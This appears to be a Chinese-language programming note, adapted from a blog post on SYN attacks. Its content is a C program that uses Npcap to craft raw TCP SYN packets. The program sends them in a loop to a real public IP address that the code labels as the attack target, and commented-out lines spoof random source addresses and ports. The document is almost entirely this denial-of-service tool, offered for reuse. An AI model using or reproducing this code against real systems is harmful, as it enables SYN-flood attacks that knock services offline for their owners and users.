Npcap.例子(raw tcp syn)
1、来自:winpcap实现syn攻击 - 125096 - CSDN博客.html(https://blog.csdn.net/qq125096885/article/details/51784524)
2、我的代码:(代码 用Npcap来跑,基本不用修改)(Win7x64、vs2017、使用 x86编译的Debug版本)
// Npcap_01.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include <iostream> #pragma warning(disable : 4996) //int main() //{ // std::cout << "Hello World!\n"; //} //#define _W64 //#define HAVE_REMOTE #include<stdio.h> #include<pcap.h> #include<winsock2.h> #include <time.h> //#include "remote-ext.h" #pragma comment(lib,"wpcap.lib") #pragma comment(lib,"WS2_32.lib") #pragma pack(push,1) typedef struct _TCP_SYN { unsigned char DstMAC[6]; // 目的mac地址 unsigned char SrcMAC[6]; // 源mac地址 unsigned char OtherData[12]; unsigned short Header_ChechSum; // 校验和 unsigned int SrcIP; // Source IP address unsigned int DstIP; // Destination IP address unsigned short SrcPort; // Source IP Port unsigned short DstPort; // Destination IP Port,一般为80端口,值为0x5000 unsigned char Ohters[16]; unsigned short pak_checksum; unsigned char OtherLast[1]; }TCP_SYN, *PTCP_SYN; #pragma pack(pop) unsigned char bufData[] = "\x00\x25\x86\x27\xd1\x22\x90\x2b\x34\x60\xbd\x44\x08\x00\x45\x00" "\x00\x34\x61\xdc\x40\x00\x80\x06\x71\x83\xc0\xa8\x01\x6a\x7a\xe4" "\xea\x6d\x0b\x0c\x00\x50\xb9\xc2\xf5\x06\x00\x00\x00\x00\x80\x02" "\xff\xff\x8d\x8d\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x01\x01\x01" "\x04\x02"; // clac the header's check sum unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum = 0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >> 16); return (unsigned short)(~cksum); } int main(int argc, char* argv[]) { pcap_if_t *alldevs; pcap_if_t *seldev; pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; srand(time(0)); /* 获取本机设备列表 */ if (pcap_findalldevs(&alldevs, errbuf) == -1) { fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf); exit(1); } // 找到一个有ip的就当有连网的网卡了 for (seldev = alldevs; seldev != NULL; seldev = seldev->next) { pcap_addr* pcapaddr = NULL; for (pcapaddr = seldev->addresses; pcapaddr != NULL; pcapaddr = pcapaddr->next) { //if (pcapaddr->addr->sa_data[2] != '\0' && pcapaddr->addr->sa_data[3] != '\0') //{ // break; //} printf("seldev->name : %s\n", seldev->name); for (int i = 0; i < 14; i++) printf("%d ", (UCHAR)pcapaddr->addr->sa_data[i]); printf("\n"); //printf("%d, %d\n", pcapaddr->addr->sa_data[2], pcapaddr->addr->sa_data[3]); if ((UCHAR)pcapaddr->addr->sa_data[2] == 172 && (UCHAR)pcapaddr->addr->sa_data[3] == 16) { printf("will break;\n"); break; } } if (pcapaddr != NULL) break; printf("\n"); } if (seldev == NULL) { fprintf(stderr, "Can not find network!\n"); exit(1); } printf("seldev->name : %d\n", seldev->name); for (int i = 0; i < 14; i++) printf("%d ", (UCHAR)seldev->addresses->addr->sa_data[i]); printf("\n"); /* 打开这个输出设备 */ if ((fp = pcap_open(seldev->name, // 设备名 100, // 要捕获的部分 (只捕获前100个字节) PCAP_OPENFLAG_PROMISCUOUS, // 混杂模式 1000, // 读超时时间 NULL, // 远程机器验证 errbuf // 错误缓冲 )) == NULL) { fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", alldevs->name); return -1; } // 修改源MAC、IP地址 , 并修改首部校验和 PTCP_SYN SynData = (PTCP_SYN)bufData; while (1) { //memcpy(SynData->SrcMAC, "\x01\x01\x01\x01\x01\x01", 6); // 源MAC地址 01:01:01:01:01:01 memcpy(SynData->SrcMAC, "\x04\xd4\xc4\x59\x7a\x1c", 6);// 04-D4-C4-59-7A-1C memcpy(SynData->DstMAC, "\x04\xf9\x38\xa6\xd7\xcb", 6);// 04-f9-38-a6-d7-cb SynData->DstIP = inet_addr("39.156.69.79"); // 攻击的目标 SynData->DstPort = htons(80); // 目标端口80 SynData->SrcIP = inet_addr("172.16.19.181");// (unsigned int)rand(); // 源IP地址随机产生 SynData->SrcPort = htons(80);// (unsigned short)rand() % 100 + 1024; // 源端口随机产生 SynData->Header_ChechSum = 0; SynData->Header_ChechSum = checksum((unsigned short*)&bufData[14], 20); // 计算checksum // printf("%d\n", SynData->Header_ChechSum); /* 发送数据包 */ // (wireshark 黑底红字为 校验和错误 的包). if (pcap_sendpacket(fp, bufData, sizeof(bufData) - 1) != 0) { fprintf(stderr, "\nError sending the packet: \n", pcap_geterr(fp)); return -1; } system("pause"); //break; } /* 释放设备列表 */ pcap_freealldevs(alldevs); return 0; }
3、
4、
5、
